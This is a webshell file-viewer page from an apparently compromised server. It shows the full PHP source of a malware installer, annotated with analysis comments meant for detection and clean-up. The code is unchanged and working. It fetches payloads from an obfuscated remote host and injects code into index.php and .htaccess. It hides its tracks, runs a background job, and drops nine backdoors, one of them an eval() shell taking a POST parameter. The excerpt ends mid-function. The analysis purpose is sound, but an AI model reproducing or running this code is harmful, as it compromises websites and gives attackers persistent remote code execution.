403Webshell
Server IP : 172.67.216.182  /  Your IP : 172.68.164.168
Web Server : Apache
System : Linux krdc-ubuntu-s-2vcpu-4gb-amd-blr1-01.localdomain 5.15.0-142-generic #152-Ubuntu SMP Mon May 19 10:54:31 UTC 2025 x86_64
User : www ( 1000)
PHP Version : 7.4.33
Disable Function : passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /www/wwwroot/savinassociates.com/


Current File : /www/wwwroot/savinassociates.com/1100.php
<?php
// ANALYSIS NOTE: entry point of a malicious installer script found in a web root.
// The comments added here describe observed behaviour for detection and clean-up;
// the code itself is unchanged.
header('Access-Control-Allow-Origin:*');
error_reporting(E_ALL);

// 99 - 99 evaluates to 0, which removes the execution time limit; the script also
// keeps running after the requesting client disconnects.
set_time_limit(99 - 99);
ignore_user_abort(1);

// Request parameters below are read without any authentication check, so any
// client that can reach this URL can drive the script.
$mode = isset($_GET["mode"]) ? $_GET["mode"] : 6;

// $oneline is only assigned here and listed as a global in sedindexht();
// no visible code reads it.
if (isset($_GET["line"])) {
    $oneline = "line";
}

// "q" selects the action: the install sequence further down runs only when it is empty.
if (isset($_GET["q"])) {
    $q = $_GET["q"];
} else if (isset($_POST["q"])) {
    $q = $_POST["q"];
} else {
    $q = '';
}

// "db" is the campaign/group id used to build the payload URL in sedindexht().
// When absent it falls back to this script's own file name without extension.
if (isset($_GET["db"])) {
    $gov = $_GET["db"];
} else if (isset($_POST["db"])) {
    $gov = $_POST["db"];
} else {
    $gov = '';
}
if ($gov === '') {
    $gov = get_filename(__FILE__);
}

// Optional uploaded file; sedindexht() uses its temp path as the payload source
// instead of the remote URL when it is present.
$sitemap_code_file = isset($_FILES['sitemap_code_file']) ? $_FILES['sitemap_code_file']['tmp_name'] : '';

// Output format: anything other than 'html' makes output_message() emit JSON.
if (isset($_POST['message_type']) && !empty($_POST['message_type'])) {
    $message_type = $_POST['message_type'];
} else {
    $message_type = 'html';
}

// Abort when no group id is available or it is above 10000 (loose comparison).
if ($gov == '' || $gov > 10000 ) {
    $check_message['status'] = 'fail';
    $check_message['message'][] = 'no group';
    output_message($check_message, $message_type);
    exit();
}

// The script's self-check requests (sitemap(), pingsitemap()) present themselves as Bingbot.
$useragent = "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)";
// Hex-escaped to hide the string from plain-text searches; it decodes to
// hxxp://s[.]newnday[.]xyz/ (defanged). Every remote payload in this file is
// fetched from this base URL over plain HTTP.
$domain = "\x68\x74\x74\x70\x3a\x2f\x2f\x73\x2e\x6e\x65\x77\x6e\x64\x61\x79\x2e\x78\x79\x7a\x2f";

// All relative file operations below therefore act on the document root.
$root = $_SERVER['DOCUMENT_ROOT'];
@chdir($root);

$http = (isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] == "on") ? 'https' : 'http';
// Taken from the Host request header, i.e. client-controlled.
$host = $_SERVER["HTTP_HOST"];

// Duplicate of the message_type handling earlier in the script.
if (isset($_POST['message_type']) && !empty($_POST['message_type'])) {
    $message_type = $_POST['message_type'];
} else {
    $message_type = 'html';
}

// Filled by fi1() with directories (relative to the document root) that have no
// index.php; enfile() later picks drop locations from this list.
$arpath8 = array();

fi1($root);

$fp2 = @fp2($root);

// Replacement .htaccess written by sedindexht(): every request that does not map
// to an existing file or directory is routed to index.php, which by then carries
// the injected code.
$ht =
    '
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]
</IfModule>
';

// Install sequence, run when no "q" parameter was supplied.
if ($q === '') {
    // The installer deletes itself first, so the file will usually be absent from
    // disk by the time the compromise is investigated.
    @unlink(__FILE__);
    // Creating this flag file makes a watcher loop started by an earlier run
    // (see the embedded script in auto_restore_cycle()) exit; the 5 second pause
    // gives that 2-second polling loop time to notice it.
    @touch($_SERVER['DOCUMENT_ROOT'] . '/3FNDICU2KH');
    sleep(5);

    // Stage 1: inject index.php and replace .htaccess.
    $sedindexht_result = sedindexht();
    output_message($sedindexht_result);

    if ($sedindexht_result['status'] == 'ok') {
        // Stage 2: check that the injected code now answers for /sitemap.xml.
        $sitemap_result = sitemap();
        output_message($sitemap_result, $message_type);

        if ($sitemap_result['status'] == 'ok') {
            // Stage 3: trigger the sitemap "ping" endpoint of the injected code.
            $pingsitemap_result = pingsitemap();
            output_message($pingsitemap_result, $message_type);

            // Stage 4: start the background job and the index.php watcher.
            $hiddencron_result = hiddencron();
            output_message($hiddencron_result);

            // Stage 5: drop additional backdoor files and report their URLs.
            $enfile_result = enfile();
            output_message($enfile_result);

            if (isset($enfile_result['file']) && sizeof($enfile_result['file'])) {
                echo "path:<br /><textarea style=\"width: 90%;height: 100px;\">";
                foreach ($enfile_result['file'] as $file) {
                    echo $file . "\t";
                }
                echo "</textarea>";
            }
            if (isset($enfile_result['htcontent'])) {
                echo "<br>htcontent:<br /><textarea style=\"width: 40%;height: 200px;\">";
                echo $enfile_result['htcontent'];
                echo "</textarea>";
            }
        }
    }
    // Runs regardless of the stage results above.
    down_s_file();
}


/**
 * Downloads a remote file named gh.gif from the operator's server and stores it
 * as gh.php in the current directory (the document root after the chdir() in the
 * main script).
 *
 * Analysis note: the content is written with a .php name, so it is presumably PHP
 * code served under an image extension. An unexpected gh.php in the web root is
 * an indicator of this installer having run.
 */
function down_s_file()
{
    global $domain;
    $gh = get($domain . '/h/gh.gif');
    if (function_exists('file_put_contents')) {
        file_put_contents('gh.php', $gh);
    } else {
        // Fallback path; note that it appends ("a+") rather than overwrites.
        $fh = fopen('gh.php', "a+");
        fwrite($fh, $gh);
        fclose($fh);
    }
}

/**
 * Reports whether at least one PHP command-execution function is usable.
 *
 * Reads the disable_functions ini setting and checks six functions against it.
 * Analysis note: a disable_functions list that covers all six names makes this
 * return false, which causes hiddencron() to skip its command-execution branch.
 *
 * @return bool true when any of the six functions is not listed as disabled
 */
function functionCheck()
{
    $disabled = explode(',', ini_get('disable_functions'));
    $new_disable = array();
    foreach ($disabled as $item) {
        // Entries may carry surrounding spaces in php.ini.
        $new_disable[] = trim($item);
    }

    $command_array = array('system', 'shell_exec', 'popen', 'exec', 'proc_open', 'passthru');

    $command_able = false;

    foreach ($command_array as $command) {
        if (!in_array($command, $new_disable)) {
            $command_able = true;
            break;
        }
    }

    return $command_able;
}

/**
 * Returns a string of $length ASCII letters taken from a shuffled alphabet.
 *
 * Used by hiddencron() to generate a random file name. The alphabet is repeated
 * until it is at least $length characters long before shuffling.
 *
 * @param int $length number of characters wanted
 * @return string
 */
function rand_abc($length)
{
    $str = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
    $strlen = 52;
    while ($length > $strlen) {
        // NOTE(review): the string doubles on each pass while the counter only
        // grows by 52; harmless here because it only needs to be long enough.
        $str .= $str;
        $strlen += 52;
    }
    $str = str_shuffle($str);
    return substr($str, 0, $length);
}

/**
 * Guesses the path of the PHP command-line binary from phpinfo() output.
 *
 * Captures the general phpinfo section in an output buffer and looks for the
 * --bindir or --prefix option in it (these appear in the build's configure
 * command). Falls back to the bare name 'php'.
 *
 * @return string candidate path of the php executable
 */
function getPhpPath()
{
    ob_start();
    phpinfo(1);
    $info = ob_get_contents();
    // NOTE(review): the purpose of this 3 second pause is not evident from the code.
    sleep(3);
    ob_end_clean();

    // The value is read up to the next '&', presumably the start of an HTML
    // entity in the phpinfo markup.
    preg_match("/--bindir=([^&]+)/si", $info, $matches);
    if (isset($matches[1]) && $matches[1] != '') {
        return $matches[1] . '/php';
    }

    preg_match("/--prefix=([^&]+)/si", $info, $matches);
    if (!isset($matches[1])) {
        return 'php';
    }

    return $matches[1] . '/bin/php';
}

/**
 * Executes a shell command through the first command-execution function that is
 * not listed in disable_functions.
 *
 * The $method argument is overwritten before use, so callers cannot choose the
 * function. Analysis note: when all six functions are disabled this returns
 * false without executing anything, which is why a complete disable_functions
 * list limits this script to file writes and HTTP requests.
 *
 * @param string $code   shell command line
 * @param string $method ignored (see above)
 * @return mixed command output, a status value, or false depending on the branch
 */
function run($code, $method = 'popen')
{
    $disabled = explode(',', ini_get('disable_functions'));
    $new_disable = array();
    foreach ($disabled as $item) {
        $new_disable[] = trim($item);
    }

    $command_array = array('system', 'shell_exec', 'popen', 'exec', 'proc_open', 'passthru');

    // Discards the caller-supplied value; the first usable function wins.
    $method = '';
    foreach ($command_array as $command) {
        if (!in_array($command, $new_disable)) {
            $method = $command;
            break;
        }
    }

    if (empty($method)) {
        return false;
    }

    $result = '';
    switch ($method) {

        case 'proc_open':
            // NOTE(review): the stderr entry pairs "pipe" with a file name, which
            // does not look like a valid descriptor spec; the process handle is
            // not kept and no output is read.
            $descriptorspec = array(
                0 => array("pipe", 'r'),
                1 => array("pipe", 'w'),
                2 => array("pipe", 'error.txt')
            );
            $pipes = array();
            proc_open($code, $descriptorspec, $pipes);
            return false;
            break;

        case 'passthru':
            // Output goes straight to the HTTP response.
            passthru($code);
            return false;
            break;

        case 'shell_exec':
            $result = '';
            $result = shell_exec($code);
            return $result;
            break;

        case 'system':
            // The second argument of system() receives the command's exit status,
            // so this branch returns a status code rather than output.
            $result = '';
            system($code, $result);
            return $result;
            break;

        case 'popen':
            $fp = popen($code, "r");
            while (!feof($fp)) {
                $out = fgets($fp, 4096);
                $result .= $out;
            }
            pclose($fp);
            return $result;
            break;

        case 'exec':
            // Output lines are returned as "index : line" pairs.
            exec($code, $array);
            foreach ($array as $key => $value) {
                $result .= $key . " : " . $value . PHP_EOL;
            }
            return $result;
            break;

        default:
            return false;
            break;
    }
}

/**
 * Reads content from a URL or a local path.
 *
 * Anything containing "http" (case-insensitive, anywhere in the string) is
 * fetched with urla(); everything else is read with file_get_contents(), which
 * is how the uploaded temp file path from the main script is loaded.
 *
 * @param string $url URL or file path
 * @return string|false
 */
function getx($url)
{
    if (stripos($url, 'http') !== false) {
        $content = urla($url);
    } else {
        $content = file_get_contents($url);
    }
    return $content;
}

/**
 * Performs an HTTP request with cURL and returns the response body.
 *
 * Follows redirects and accepts gzip/deflate. Sends a POST when $postdata is a
 * non-empty array, otherwise a GET.
 *
 * @param string     $url
 * @param array|null $header   extra request header lines
 * @param array|null $postdata POST fields
 * @return string|bool response body, or false on failure
 */
function urla($url, $header = null, $postdata = null)
{
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch, CURLOPT_ENCODING, 'gzip,deflate');

    // NOTE(review): certificate checks are switched off only when the URL does
    // NOT contain "https:"; for https URLs the cURL defaults stay in effect. The
    // condition looks inverted relative to what the author probably intended.
    if (stripos($url, "https:") === false) {
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
    }

    if (is_array($header) && !empty($header)) {
        curl_setopt($ch, CURLOPT_HTTPHEADER, $header);
    }
    if (is_array($postdata) && !empty($postdata)) {
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata);
    }

    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    $body = curl_exec($ch);
    curl_close($ch);
    return $body;
}

/**
 * Prints a stage result to the HTTP response for the operator.
 *
 * In any mode other than 'html' the result is emitted as JSON. In 'html' mode
 * the title, each message and the status are printed with colour markup.
 * Message text is echoed without HTML escaping.
 *
 * @param mixed  $result       expected to be an array with 'title', 'message', 'status'
 * @param string $message_type 'html' or anything else for JSON
 * @param string $html_tag     tag wrapped around each message
 * @return void
 */
function output_message($result, $message_type = 'html', $html_tag = 'li')
{

    if ($message_type != 'html') {
        echo json_encode($result);
        return;
    }

    if (!is_array($result)) {
        return;
    }

    if (!isset($result['title'])) {
        $result['title'] = '';
    }

    echo '---------start ' . $result['title'];

    // NOTE(review): 'message' is read without an isset() check.
    if (sizeof($result['message']) > 0) {
        foreach ($result['message'] as $message) {
            // Highlights the words "success", " ok" and "fail" inside the text.
            $message = str_replace('success', '<font color="blue">success</font>', $message);
            $message = str_replace(' ok', '<font color="blue"> ok</font>', $message);
            $message = str_replace('fail', '<font color="red">fail</font>', $message);
            echo "<$html_tag>" . $message . "</$html_tag>";
        }
    }

    if (isset($result['status']) && !empty($result['status'])) {

        if ($result['status'] == 'ok') {
            $status = '<font color="green">' . $result['status'] . '</font>';
        }

        if ($result['status'] == 'fail') {
            $status = '<font color="red">' . $result['status'] . '</font>';
        }

        // NOTE(review): $status is undefined here when the status is neither
        // 'ok' nor 'fail'.
        echo '---------end ' . $result['title'] . '===>status:' . $status;

    } else {

        // A missing or empty status is reported as ok.
        $status = '<font color="green">ok</font>';

        echo '---------end ' . $result['title'] . '===>status:' . $status;
    }

    echo "<br />";
    echo "<br />";
}

/**
 * Injects a downloaded payload at the top of the site's index.php and replaces
 * the site's .htaccess.
 *
 * Observed behaviour, useful for detection and clean-up:
 *  - the payload comes from the operator's server (path built from the group id
 *    and mode, extension .idx) or from the uploaded temp file;
 *  - the original index.php is copied once to index<N>.php, where N is the
 *    weekday number from date("w"), i.e. index0.php .. index6.php;
 *  - the injected block ends with a marker made of a PHP open tag, the comment
 *    "// <group id>" and a PHP close tag; if a marker with a numeric id is
 *    already present, everything up to it is replaced (re-infection/update);
 *  - both files get their modification time set back to index.php's earlier
 *    change time and are made read-only (0444);
 *  - the opcode cache is reset so the modified index.php takes effect at once.
 *
 * @return array result with 'title', 'status' and 'message' entries
 */
function sedindexht()
{
    global $root, $http, $host, $ht, $gov, $sitemap_code_file, $oneline, $mode,$domain;

    $return_data = [];
    $return_data['title'] = 'start set index .htaccess';
    $return_data['status'] = 'ok';


    // Relative path: resolved against the document root (see chdir() in the main script).
    if (!file_exists('index.php')) {
        $return_data['status'] = 'fail';
        $return_data['message'][] = 'index.php not exists.';
        return $return_data;
    } else {
        $return_data['message'][] = 'index.php file exists.';
    }

    // Remembered so the timestamps can be set back after the modification.
    $file_time = filectime('index.php');

    if (empty($sitemap_code_file)) {
        $url = $domain . $gov . '/' . $gov . '.' . $mode . '.idx';
    } else {
        $url = $sitemap_code_file;
    }
    // Make the file writable in case an earlier run left it at 0444.
    @chmod('index.php', 0644);

    $uc = getx($url);
    $b = @file_get_contents('index.php');
    // One-time copy of the current index.php; on a re-infected site this copy may
    // itself already contain injected code, so verify it before restoring from it.
    if (!file_exists('index' . date("w") . '.php')) {
        @file_put_contents('index' . date("w") . '.php', $b);
    }
    //substr_count($b,'<?php')>2
    $needle = '<?php // ' . $gov . '?>';
    $idx_code = $uc . $needle;
    if (preg_match('/<\?php \/\/ [0-9]*\?>/', $b)) {
        // Marker found: swap the previously injected block for the new one.
        $new_content = preg_replace('/[\s\S]*?<\?php \/\/ [0-9]*\?>/', $idx_code, $b);
    } else {
        // First infection: prepend payload and marker to the original content.
        $new_content = $idx_code . $b;
    }

    // NOTE(review): the download result $uc is not checked before writing.
    $put_load_result = @file_put_contents('index.php', $new_content);

    if (!$put_load_result) {
        $return_data['message'][] = 'modify file index.php file fail.';
    } else {
        // Sets the modification time back so the file does not look recently edited.
        touch('index.php', $file_time);
        $return_data['message'][] = 'index.php time update success.';

        $return_data['message'][] = 'modify file index.php file success.';
        @chmod('index.php', 0444);
    }

    // The existing .htaccess is overwritten, not merged; site-specific rules are lost.
    @chmod('.htaccess', 0644);
    $n = file_put_contents('.htaccess', $ht);

    if (!$n) {
        $return_data['status'] = 'fail';
        $return_data['message'][] = 'write .htaccess file fail';
    } else {
        $return_data['message'][] = '.htaccess create success.';

        touch('.htaccess', $file_time);
        $return_data['message'][] = '.htaccess time modify success';
        @chmod('.htaccess', 0444);
        $return_data['message'][] = '.htaccess 0444 modify success';
    }
    try {
        function_exists('opcache_reset') && opcache_reset();
    } catch (\Exception $E) {
    }

    $return_data['message'][] = "change data group: $gov .htaccess index ok\n";

    return $return_data;
}

/**
 * Deletes the site's real sitemap.xml and checks what the site now serves at
 * /sitemap.xml.
 *
 * The request goes to the compromised site itself with the Bingbot user agent.
 * The response is classified as "ours" when it carries one of two specific
 * urlset/sitemapindex opening tags with an xmlns:xhtml attribute, which is
 * presumably what the injected index.php code generates.
 *
 * Analysis note: a missing sitemap.xml file combined with a dynamically served
 * one is a visible side effect of this stage.
 *
 * @return array result with 'title', 'status' and 'message' entries
 */
function sitemap()
{
    global $root, $http, $host, $domain, $ht, $gov, $useragent;

    $return_data = [];
    $return_data['status'] = 'ok';
    $return_data['title'] = 'start sitemap';

    // With the static file gone, the rewrite rule sends /sitemap.xml to index.php.
    if (file_exists('sitemap.xml')) {
        unlink('sitemap.xml');
    }
    $content = urla(sprintf("%s://%s/sitemap.xml", $http, $host), array('User-Agent: ' . $useragent));
    //libxml_disable_entity_loader(false);
    //$xml = simplexml_load_string($content, 'SimpleXMLElement', LIBXML_NOCDATA);
    //$xx = json_decode(json_encode($xml), true);

    // When the first response contains '<sitemap><loc>', the query-string form
    // of the URL is requested instead.
    if (strpos($content, '<sitemap><loc>') === false) {

    } else {
        $content = urla(sprintf("%s://%s/?sitemap.xml", $http, $host), array('User-Agent: ' . $useragent));
    }

    if ($content == false) {

        $return_data['status'] = 'fail';
        $return_data['message'][] = 'sitemap.xml get fail';
        return $return_data;

    } else {

        if (strpos($content, '<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9" xmlns:xhtml="https://www.w3.org/1999/xhtml">') !== false) {
            $return_data['message'][] = 'sitemap.xml get success';
            $return_data['message'][] = 'sitemap.xml is ours';
        } else if (strpos($content, '<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9" xmlns:xhtml="http://www.w3.org/1999/xhtml">') !== false) {
            $return_data['message'][] = 'sitemap.xml get success';
            $return_data['message'][] = 'sitemap.xml is ours';
        } else {
            // Only a message is added; 'status' stays 'ok' in this case.
            $return_data['message'][] = 'sitemap.xml get fail';
            $return_data['message'][] = 'sitemap.xml is not ours';
        }

    }

    return $return_data;

}

/**
 * Requests /pgg.xml (and, as a fallback, /?pingsitemap.xml) on the compromised
 * site with the Bingbot user agent and reports whether the response mentions
 * "sitemap".
 *
 * Neither path is a file this script creates; they are presumably handled by the
 * injected index.php code through the rewrite rule. Requests for these two paths
 * in access logs are an indicator of this installer.
 *
 * @return array result with 'title', 'status' and 'message' entries
 */
function pingsitemap()
{
    global $root, $http, $host, $domain, $ht, $gov, $useragent;

    $return_data = [];
    $return_data['title'] = 'start ping sitemap';

    // $content = urla(sprintf("%s://%s/pingsitemap.xml", $http, $host),array('User-Agent: '.$useragent));
    $content = urla(sprintf("%s://%s/pgg.xml", $http, $host), array('User-Agent: ' . $useragent));

    // Position of the last occurrence; tested for truthiness below, so a match
    // at offset 0 would count as a failure.
    $result = strrpos($content, 'sitemap');

    if ($result) {
        $return_data['status'] = 'ok';
        $return_data['message'][] = "!!! 3.1 get and ping sitemap.xml ok\n" . $result . "\n";
    } else {

        $content = urla(sprintf("%s://%s/?pingsitemap.xml", $http, $host), array('User-Agent: ' . $useragent));
        $result = strrpos($content, 'sitemap');

        if ($result) {

            $return_data['status'] = 'ok';
            $return_data['message'][] = "!!! 3.1 get and ping sitemap.xml ok\n" . $result . "\n";

        } else {

            $return_data['status'] = 'fail';
            $return_data['message'][] = "!!! 3.1 get and ping sitemap.xml fail\n" . $result . "\n";

        }

    }

    return $return_data;
}

/**
 * Returns the part of a file's base name before the first dot.
 *
 * The main script calls this on its own path to derive the group id when no
 * "db" parameter is given, so the installer's file name encodes that id.
 *
 * @param string $file_path
 * @return string
 */
function get_filename($file_path)
{
    $file_base_name = basename($file_path);
    $file_name_arr = explode('.', $file_base_name);
    $f_name = $file_name_arr[0];
    return $f_name;
}

/**
 * Recursively collects directories that do not contain an index.php.
 *
 * Results are appended to the global $arpath8 as paths relative to the document
 * root; enfile() uses them as drop locations. Symbolic links are skipped and
 * recursion stops once the relative path has three or more slashes.
 *
 * @param string $path directory to scan
 * @return void
 */
function fi1($path)
{
    global $root, $arpath8;
    // NOTE(review): the directory handle is never closed with closedir().
    if ($handle = opendir($path)) {
        while (($file = readdir($handle)) !== false) {
            if ($file != "." && $file != "..") {
                $pfile = $path . "/" . $file;
                if (is_dir($pfile) && !is_link($pfile)) {
                    // Depth limit, measured on the path relative to the root.
                    if (substr_count(str_replace($root . '/', '', $pfile), '/') < 3) {
                        fi1($pfile);
                    }
                    if (!file_exists($pfile . "/index.php")) {
                        array_push($arpath8, str_replace($root . '/', '', $pfile));
                    }
                }
            }
        }
    }
    // Runs at every recursion level; the final order of the list is random.
    shuffle($arpath8);
}

/**
 * Returns the entries of the global $arpath8 that have at least three path
 * segments.
 *
 * The $root parameter shares its name with the global imported on the first
 * line of the body. The result is stored in $fp2 by the main script; enfile()
 * lists it as a global but no visible code reads it.
 *
 * @param string $root document root
 * @return array list of relative directory paths
 */
function fp2($root)
{
    global $root, $http, $host, $domain, $ht, $gov, $arpath8;

    $p_arr = array();
    $pnew_arr = array();

    foreach ($arpath8 as $k => $v) {
        $qupath = str_replace($root, "", $v);
        $p_arr[$k] = explode("/", $qupath);
        if (count($p_arr[$k]) >= 3) {
            $pnew_arr[] = $v;
        }
    }

    return $pnew_arr;
}

/**
 * Starts a detached background PHP process from a downloaded script, then
 * starts the index.php watcher.
 *
 * Observed behaviour, useful for detection and clean-up:
 *  - only attempted when functionCheck() finds a usable command-execution
 *    function;
 *  - the script body is downloaded from the operator's server (path c/idxcron),
 *    prefixed with a PHP open tag and written to a file with a random
 *    four-letter lower-case name ending in .php in this script's directory;
 *  - it is launched with nohup and the PHP binary guessed by getPhpPath(), with
 *    output discarded and the process put in the background;
 *  - the file is deleted two seconds later, so the process keeps running with
 *    no file left on disk. Look for long-running php processes owned by the web
 *    server user rather than for the file.
 *
 * auto_restore_cycle() is called in every case, including when command
 * execution is unavailable.
 *
 * @return array result with 'title' and 'message' entries
 */
function hiddencron()
{
    global $root, $http, $host, $ht, $gov,$domain;


    $return_result = [];
    $return_result['title'] = __FUNCTION__;

    if (functionCheck() !== false) {

        $uc = urla($domain . 'c/idxcron');


        if (mb_strlen($uc) > 0) {
            $return_result['message'][] = "cron file get success";
            $uc = '<?php ' . "\r\n" . $uc;
        } else {
            $return_result['message'][] = "cron file get fail";
            return $return_result;
        }

        $cronfile = __DIR__ . "/" . strtolower(rand_abc(4)) . ".php";

        // The literal text __DIR__ inside the downloaded script is replaced by
        // this script's directory, so the job still knows the path after its own
        // file has been deleted.
        $runbody = str_replace('__DIR__', "'" . __DIR__ . "'", $uc);

        if (function_exists('file_put_contents')) {

            $fpcr = file_put_contents($cronfile, $runbody);

            if ($fpcr) {
                $return_result['message'][] = "cron file write success";
            } else {
                $return_result['message'][] = "cron file write fail";
            }

        } else {

            $cfh = fopen($cronfile, 'w+');
            $fr = fwrite($cfh, $runbody);
            fclose($cfh);

            if ($fr > 0) {
                $return_result['message'][] = "cron file write success";
            } else {
                $return_result['message'][] = "cron file write fail";
            }

        }

        $php_bin = getPhpPath();

        // The base64 string decodes to "> /dev/null 2>&1 &": discard all output
        // and run in the background. Encoding it hides the redirection from
        // plain-text searches.
        $code = "nohup " . $php_bin . ' ' . $cronfile . ' ' . base64_decode('PiAvZGV2L251bGwgMj4mMSAm');

        $run_result = run($code);

        // An empty/false result is reported as success, since a detached command
        // is expected to return no output.
        if (!$run_result) {
            $return_result['message'][] = $code . " run success";
        } else {
            $return_result['message'][] = $code . " run fail";
        }

        sleep(2);

        if (@unlink($cronfile)) {
            $return_result['message'][] = "delete " . $cronfile . " ok";
        } else {
            $return_result['message'][] = "delete " . $cronfile . " fail";
        }

    } else {
        $return_result['message'][] = "function disable cron fail ";
    }

    $arr_msg = auto_restore_cycle();
    foreach ($arr_msg as $key => $msg) {
        $return_result['message'][] = $msg;
    }
    return $return_result;
}

/**
 * Drops additional backdoor files across the site and records where they are.
 *
 * Observed behaviour, useful for detection and clean-up:
 *  - nine files are written, one each into wp-content, wp-includes and seven
 *    randomly chosen directories from $arpath8; their names imitate WordPress
 *    core files (see $self_shell_name) and their content is downloaded from the
 *    operator's server under .gif names;
 *  - versions.php is written to the current directory with a one-line script
 *    that evaluates the POST parameter "cdshell" as PHP code;
 *  - .hcontentold in the document root stores a JSON map of directory to
 *    dropped file name, which doubles as an inventory of the dropped files
 *    during clean-up;
 *  - .hcontent in the document root stores an .htaccess template that denies
 *    direct access to script files except names matching a "{#htens}"
 *    placeholder; nothing in this file fills in the placeholder.
 *
 * @return array result with 'title', 'status', 'message', 'file' (URLs of the
 *               dropped files) and optionally 'htcontent'
 */
function enfile()
{

    global $root, $http, $host, $domain, $arpath8, $fp2;

    $htens = [];
    $return_result = [];
    $return_result['title'] = 'create shell';
    $return_result['status'] = 'ok';
    $return_result['file'] = [];

    $check_repeat = array();
    $custom_file = array('wp-content', 'wp-includes');


    // Remote names of the nine payloads, fetched from the "t1" path below.
    $wrmfwlf = array('/h1.gif', '/h2.gif', '/h3.gif', '/h4.gif', '/h5.gif', '/i1.gif', '/i2.gif', '/i3.gif', '/i4.gif');
    // NOTE(review): asks array_rand() for seven keys; no check that $arpath8
    // holds that many entries.
    $ranfile = array_rand($arpath8, count($wrmfwlf) - count($custom_file));
    foreach ($ranfile as $i) {
        array_push($custom_file, $arpath8[$i]);
    }
    $self_shell_name = ['updates.php', 'themes.php', 'wp-loads.php', 'wp-mails.php', 'wp-configs.php', 'dimensiones.php', 'duotones.php', 'spacings.php', 'wp-config-samples.php'];

    $i = 0;
    while ($i < sizeof($wrmfwlf)) {
        $htens[$custom_file[$i]] = $self_shell_name[$i];

        // Target path is relative to the document root.
        $sf = $custom_file[$i] . '/' . $self_shell_name[$i];
        $rf = get($domain . 't1' . $wrmfwlf[$i]);
        $fh = @fopen($sf, "w+");
        if ($fh) {
            $xd_ok = fwrite($fh, $rf);
            fclose($fh);
        } else {
            $xd_ok = false;
        }
        if ($xd_ok) {
            $xd_url = $http . "://" . $host . '/' . $sf;
            $return_result['message'][] = 'file:' . " \t" . $xd_url . ' success';
            $return_result['file'][] = $xd_url;
            //if( basename($sf.'/index.php') != 'index.php' ){
            //    $self_shell_name[] = basename($sf);
            //}
        }
        $i++;
    }

    $cdf = 'versions.php';

    // Unauthenticated remote code execution endpoint: whatever is posted in
    // "cdshell" is passed to eval(). Any request log entry with a POST to
    // versions.php should be treated as attacker activity.
    $fh = fopen($cdf, "w+");
    $xd_ok = fwrite($fh, "<?php if(isset(\$_POST['cdshell']) && !empty(\$_POST['cdshell'])){@eval(\$_POST['cdshell']);} ?>");
    fclose($fh);

    if ($xd_ok) {
        $xd_url = $http . "://" . $host . '/' . $cdf;
    }

    // NOTE(review): reported as success even when the write above failed; in
    // that case $xd_url still holds the value from the loop.
    $return_result['message'][] = 'file:' . " \t" . $xd_url . ' success';
    $return_result['file'][] = $xd_url;
    $self_shell_name[] = 'versions.php';

    $htc = '';

    $htc .= '<IfModule mod_rewrite.c>' . "\n";
    $htc .= 'RewriteEngine On' . "\n";

    $htc .= 'RewriteBase /' . "\n";
    $htc .= 'RewriteRule ^index.php$ - [L]' . "\n";
    $htc .= 'RewriteCond %{REQUEST_FILENAME} !-f' . "\n";
    $htc .= 'RewriteCond %{REQUEST_FILENAME} !-d' . "\n";
    $htc .= 'RewriteRule . index.php [L]' . "\n";
    $htc .= '</IfModule>' . "\n";
    // Blocks direct requests to script files in general ...
    $htc .= '<FilesMatch ".*\.(py|exe|phtml|php|PHP|Php|PHp|pHp|pHP|phP|PhP|php5|suspected)$">' . "\n";
    $htc .= 'Order Allow,Deny' . "\n";
    $htc .= 'Deny from all' . "\n";
    $htc .= '</FilesMatch>' . "\n";
    // ... and re-allows the names substituted for the placeholder, presumably the
    // dropped files, by a component not shown here.
    $htc .= '<FilesMatch "^({#htens})$">' . "\n";
    $htc .= 'Order Allow,Deny' . "\n";
    $htc .= 'Allow from all' . "\n";
    $htc .= '</FilesMatch>' . "\n";

    $htresult = file_put_contents($root . '/.hcontentold', json_encode($htens));
    $htresult = file_put_contents($root . '/.hcontent', $htc);
    if ($htresult) {
        $return_result['htcontent'] = $htc;
    }

    return $return_result;
}

/**
 * Fetches a URL with cURL and returns the response body.
 *
 * Same behaviour as urla() without header/POST support, plus an empty Expect
 * header. Used for the payload downloads in down_s_file() and enfile().
 *
 * @param string $url
 * @return string|bool response body, or false on failure
 */
function get($url)
{
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch, CURLOPT_ENCODING, 'gzip,deflate');
    curl_setopt($ch, CURLOPT_HTTPHEADER, array('Expect:'));

    // NOTE(review): as in urla(), certificate checks are switched off only for
    // URLs that do not contain "https:".
    if (stripos($url, "https:") === false) {
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
    }

